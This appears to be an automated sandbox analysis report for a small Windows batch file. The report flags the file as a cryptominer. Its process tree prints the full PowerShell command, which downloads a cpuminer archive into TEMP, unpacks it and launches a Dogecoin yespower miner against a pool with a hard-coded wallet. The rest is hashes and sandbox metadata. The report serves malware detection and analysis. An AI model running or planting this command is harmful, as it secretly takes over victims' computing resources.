b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1798s
max time network
1807s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
04/02/2024, 14:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	4264	powershell.exe
14	4264	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1352	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1352	cpuminer-sse2.exe
1352	cpuminer-sse2.exe
1352	cpuminer-sse2.exe
1352	cpuminer-sse2.exe
1352	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4264	powershell.exe
4264	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4264	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 5404 wrote to memory of 4264	5404	cmd.exe	84
PID 5404 wrote to memory of 4264	5404	cmd.exe	84
PID 4264 wrote to memory of 5644	4264	powershell.exe	94
PID 4264 wrote to memory of 5644	4264	powershell.exe	94
PID 5644 wrote to memory of 1352	5644	cmd.exe	95
PID 5644 wrote to memory of 1352	5644	cmd.exe	95

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4264
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5644
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1352

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_obxqffgi.lub.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
747KB

MD5
2f4dbc4b001a8b3b4f5a2b51c8807f82

SHA1
3d8cb69cea63f148cd168175d9c67f88d533ef93

SHA256
b1c92ea7e8e7003c3a7d5fb3642424af480f1e13d547e50ebd895bce27ddeea2

SHA512
d3a8c8cda4af091e3d533c78761b8eeba52a44af4e54d5f1d1a81f2d21b1afe6b60fdf0312f928f87a7c260fc2b74d285dc73ad0b1c8638d177dc323dd2876a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
619KB

MD5
c0657ea807cfc5664c0a14f3a347f749

SHA1
101fa264e4fd62874efe1dccc9ac2ae3874db67e

SHA256
f2ab2fef4f52b9ff5ce4ac4606d53603add10ad466c618eca953a28c762f9dee

SHA512
a80c681646512ab399aa6d6ea8d48af4b7e94eed07b96f4f02a4948b04cc7c115928340f2972fc8f62e83bff08ccb6166ba79a249b4f7d4afda2c01dfcb8981b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
778KB

MD5
d27fbefb8de64e0c1676c7caebf9af64

SHA1
2cb72b471232992735218b185785fa3c12203bab

SHA256
5c69dc359895ffe7a5d9ce4da2d8c7a8e2951bdf03ea6c4febfbf72255ebbbd8

SHA512
067b0eb0ef3f73ec38f525af006fb63b33e2de14b9e61e13a5f996bc728bcf154d84c663b2dd3dad5601fffdea804d1ec827ed77256bad1b1db65d96dcb4d97f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
756KB

MD5
ded3aaf85f57fb4aa50e4b981629f7fd

SHA1
00d17829a6106da1210024e5d03f96054ec8a375

SHA256
ac55ab0a5425637dbdb88a5a79e56e5bb372b21533e2cb46ada9688621cd6291

SHA512
d58d9b9b8cb3ef03087fe9eafa15cefe5548a5a5ca43d61adf81dbb33fb2c1bd0da5a1af4d7aa2a98b11aa2b0564d99920fe54eff505f4fa833cee56c118496a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
671KB

MD5
3c044d043e5fa2031ad85ccdf8733fcc

SHA1
86fbc5b5eb651ca5845de78ecbc0eecfb5156bee

SHA256
c94c9c81656ca754f7e9c1eb253b2643f2b8f34b3c0fc7b2c6d3152c88639874

SHA512
da37bb1d7dcbbbf6e9b1ea451bfe0d037da7e9df120d48f793284bfaa25f88b8b966c2a712bca900b458b30b3740d1fcc886b42c6169158c23e976a7ee196cca

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
759KB

MD5
23da0f5df1d03abf59c64eb98f51f9b8

SHA1
2ed6770d3c4d0097d686b607509f89eae89585a1

SHA256
5eec9910e7fa7d85b78f1a752d7b0e5b9d2ed23e9136f911a9c8e21ecadcc805

SHA512
c1973aee63adee335b6e6de3a77dd8d5ae2363ed8b8dc8a32e200a32813493701bda225c433039eab919b6b771295634df9356ed7323f265e03f636b909a0b8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
618KB

MD5
9585dbb9aac2ece3cccc33e8b2b4965e

SHA1
96861b732abaaaa82c3c5e43ccc5483a80ddb701

SHA256
37d2ff773a3a8474bb76ae2424f19847a3f6c7e14651ef066ef01c52e99b9c18

SHA512
48551dbba12f632176e62bfafe236b64fd9fb1378b9f78d90321d1fdb812ae3a8a25d54db478f0a5176c20fd51d4256f9d1bb9c3ffccadabadbdcf1d235fb84b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
236KB

MD5
f96152d945bc2acdd44aba22e2f3178b

SHA1
5dcab81a0ee401f0d491259be4bbc1db40ecd81e

SHA256
6769c7c33b289b16c505cef7bc7fe03e8b7cd8c4eb75e1e4dc98d1fe4021eb07

SHA512
88611c06f3e3ca43b4f6c607b8be1ec0c748992257a016c9784e9883ee3471477c5207a07fac53d9876f900f260ff92df2703f7398e7f2b7d9f1452dd2244425

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
385KB

MD5
4cc64ddf36176dce7269358a028591d5

SHA1
5083168e2ece57fa0f9a8bca0bb699046baeb2b8

SHA256
1883cc43e2153833730c5c6eb0e29731c8fbcb552c0eaf03b1d04d3611c899b2

SHA512
c6ee8cb18362851ec8f5aa583d30a9a97efca3a94f7c9e3b59cecc1950ecdbdd2683fa34f879f80a5f1d2f1850dfa68453838f825facf336cc1a00f46f83a9f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
539KB

MD5
cf89527149a942cc898d79fe59079847

SHA1
5f0938d7c8f73761b44cc918b06e795a1b257c3b

SHA256
e17e8d126266406f47546f44571c4eb5034e9068986a8352ee676217281fa64a

SHA512
720dbe2cc1466fb7e65f86a0d67bf540d57c8c52519a2c531141b2809d3afaba3dbcedb85d655069a4ab6c4545a1c0c08315a87a43d11fae61e930d7081ed9f8

Download Submit
memory/1352-74-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1352-82-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1352-132-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1352-117-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1352-112-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1352-102-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1352-97-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1352-92-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1352-87-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1352-77-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1352-76-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/1352-75-0x0000000070C80000-0x0000000070D18000-memory.dmp

Filesize
608KB

Download
memory/1352-73-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1352-72-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4264-13-0x000002771DC10000-0x000002771DC20000-memory.dmp

Filesize
64KB

Download
memory/4264-6-0x000002771DCB0000-0x000002771DCD2000-memory.dmp

Filesize
136KB

Download
memory/4264-11-0x000002771DBF0000-0x000002771DC00000-memory.dmp

Filesize
64KB

Download
memory/4264-12-0x00007FFA41960000-0x00007FFA42421000-memory.dmp

Filesize
10.8MB

Download
memory/4264-14-0x00000277381F0000-0x00000277382FE000-memory.dmp

Filesize
1.1MB

Download
memory/4264-59-0x00007FFA41960000-0x00007FFA42421000-memory.dmp

Filesize
10.8MB

Download
memory/4264-0-0x0000027737F40000-0x0000027737FD2000-memory.dmp

Filesize
584KB

Download
memory/4264-15-0x000002771DC10000-0x000002771DC20000-memory.dmp

Filesize
64KB

Download
memory/4264-16-0x000002771DE80000-0x000002771DE96000-memory.dmp

Filesize
88KB

Download
memory/4264-17-0x00007FFA41960000-0x00007FFA42421000-memory.dmp

Filesize
10.8MB

Download
memory/4264-18-0x000002771DC10000-0x000002771DC20000-memory.dmp

Filesize
64KB

Download
memory/4264-20-0x000002771DEA0000-0x000002771DEB2000-memory.dmp

Filesize
72KB

Download
memory/4264-21-0x000002771DC90000-0x000002771DC9A000-memory.dmp

Filesize
40KB

Download